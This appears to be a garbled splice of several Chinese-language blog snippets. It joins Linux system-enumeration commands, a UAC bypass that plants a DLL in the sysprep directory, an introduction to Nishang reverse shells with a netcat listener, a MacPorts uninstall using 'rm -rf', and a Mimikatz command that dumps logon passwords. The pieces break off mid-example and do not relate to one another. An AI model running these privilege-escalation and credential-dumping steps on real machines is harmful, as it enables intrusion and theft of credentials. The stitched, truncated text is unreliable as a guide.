0x00 操作系统相关

操作系统类型版本

1
2
3
4

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release      # Debian 
cat /etc/redhat-release   # Redhat

内核版本，是否是64位

1
2
3
4
5
6

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

0x00 简介

UAC(User Account Control，用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术，它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前，提供权限或管理员‌密码。也就是说一旦用户允许启动的应用程序通过UAC验证，那么这个程序也就有了管理员权限。许多情况下，我们获取了反弹的shell但是由于UAC这个烦人的东西并不能获取最高的权限，今天主要介绍使用powershell来bypass uac从而获取更高的权限。

0x01 Bypass UAC

通常绕过UAC的方法如下：

• step1: 复制DLL文件到C:\Windows\System32\sysprep目录，DLL的名字取决于操作系统版本，比如Windows7为CRYPTBASE.dll，Windows8为shcore.dll。
• step2：从上面的目录执行Sysprep.exe。他将加载上面的DLL，完成权限的提升。

nishang之花样shell

0x00 简介

Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。本篇主要介绍nishang中的各种shell。主要针对预装有powershell的系统。

0x01 TCP shell

1.Reverse shell

Attacker执行:

1
2

root@kali:~# nc -lvp 4444
listening on [any] 4444 ..

1.更新loacte库

1

sudo /usr/libexec/locate.updatedb

2.macport跟homebrew不兼容。
卸载macport：

1
2
3
4
5
6
7
8
9
10
11
12
13

sudo port -f uninstall installed
sudo port clean all
sudo rm -rf \
/opt/local \
/Applications/DarwinPorts \
/Applications/MacPorts \
/Library/LaunchDaemons/org.macports.* \
/Library/Receipts/DarwinPorts*.pkg \
/Library/Receipts/MacPorts*.pkg \
/Library/StartupItems/DarwinPortsStartup \
/Library/Tcl/darwinports1.0 \
/Library/Tcl/macports1.0 \
~/.macports

Mimikatz 使用Tips1.记录 Mimikatz输出：C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit & ...